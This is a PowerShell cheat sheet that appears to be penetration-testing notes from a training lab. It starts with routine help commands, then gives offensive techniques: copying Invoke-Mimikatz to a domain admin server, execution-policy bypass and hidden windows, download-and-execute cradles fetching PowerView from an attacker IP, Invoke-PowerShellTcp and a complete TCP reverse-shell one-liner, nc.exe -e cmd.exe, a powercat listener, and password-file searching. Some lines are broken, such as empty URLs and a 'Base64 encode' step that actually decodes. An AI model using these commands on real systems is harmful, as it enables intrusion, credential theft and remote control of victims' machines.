Powershell Fu

  • -Full : Lists full help about a topic

  • -Examples: Lists examples of how to run a a cmdlet

#Powershell Help
help *keyword*
powershell /? 
powershell -?
powershell -Help
Get-Help *

#List Everything which contains the word process
Get-Help (process_name) -Full -Examples

#List all cmdlets
Get-Command -CommandType cmdlet
#Cmdlets: List full
Get-ChildItem | Format-List  *

Get-Process | Sort-Object -Unique | Select-Object ProcessName

#Default Modules directory

#List all Wmi classes
Get-WmiObject -Class Win32_Volume

#Get Alias
Get-Alias -Definition Get-ChildItem
#Updates the Help System

#Explore Registry
cd HKLM:\

#Scouring for files
Select-String -Path C:\Users\Dan\*.txt -Pattern pass*
Get-ChildItem -Path $searchinfolder -Filter $filename -Recurse | %{$_.FullName} 

#Open Files
Get-Content "File name.txt"

#Copy Files
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

#Hides powershell window during execution
powershell.exe -WindowStyle Hidden .\script1.ps1

#Add user to a group
Add-ADGroupMember -Identity <Group> -Members <User>

#Remove User from a Domain Group
Remove-ADGroupMember -Identity <Group> -Members <User>
Remove-LocalGroupMember -Identity <Group> -Members <User>

#Import A Module
Import-Module <modulepath>

#List All Commands In A Module
Get-Command -Module <modulename>
Get-Command -Name Firewall

#View truncated output
<Command> | out-string -Width 500
#Outputs a single string 
-<Command> | Out-string -Stream

#Path where all of the history is saved



#Shortcut directory
"%appdata%\Microsoft\Windows\Start Menu\Programs\Windows Powershell"

#Run Powershell
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#Check whether powershell is running as 32Bit/64Bit

#Run Powershell as 64Bit Process
c:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#On a 64-Bit System, run powershell as 32Bit Process
c:\windows\sysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass

#Base64 encode a file
$EncodedText = Get-Content "File_to_be_encoded"
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

#Execute Base64 encoded scripts
powershell -EncodedCommand $enccommand

#Download Files
Invoke-WebRequest -Uri "" -OutFile "PowerView.ps1"
powershell "(New-Object Net.WebClient).DownloadFile('','jp.exe')"

#Download & Execute 
powershell IEX(New-Object Net.WebClient).DownloadString('')                                                                                                                                               Find-AllVulns"
iex (iwr http://<IP>/PowerView.ps1 -UseBasicParsing)

#Execute Commands/Script Block
powershell.exe -Command "& {Get-EventLog -LogName security}"
powershell.exe -Command "& {Import-Module .\Sher.ps1; Find-AllVulns}"
powershell -c "<Command>"

#Unzip files
Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip{param([string]$zipfile, [string]$outpath)[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)}
Unzip "C:\a.zip" "C:\a"
#In case of error with System.IO.Compression:
Add-Type -Path "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.5\System.IO.Compression.FileSystem.dll"
  • Using functions

Login as user using Powershell

  • Requires: Username:Password Hash

  • Shell access(eg:nc)

$username = 'BART\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force '3130438f31186fbaf962f407711faddb'
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Enter-PSSession -ComputerName localhost -Credential $credential

# To get a new shell as Administrator:
cmd.exe /c "C:\inetpub\wwwroot\internal-01\log\nc.exe 41337 -e cmd.exe"

Reverse Shells

#Download and execute
powershell iex (New-Object Net.WebClient).DownloadString('');Invoke-PowerShellTcp -Reverse -IPAddress -Port 9001
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''));Find-LocalAdminAccess
powershell.exe iex (iwr http://<IP>/File.ps1 -UseBasicParsing);Invoke-AllChecks

#One-liner Reverse-shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',45000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


. .\powercat.ps1
powercat -l -v -p 443 -t 1000

Last updated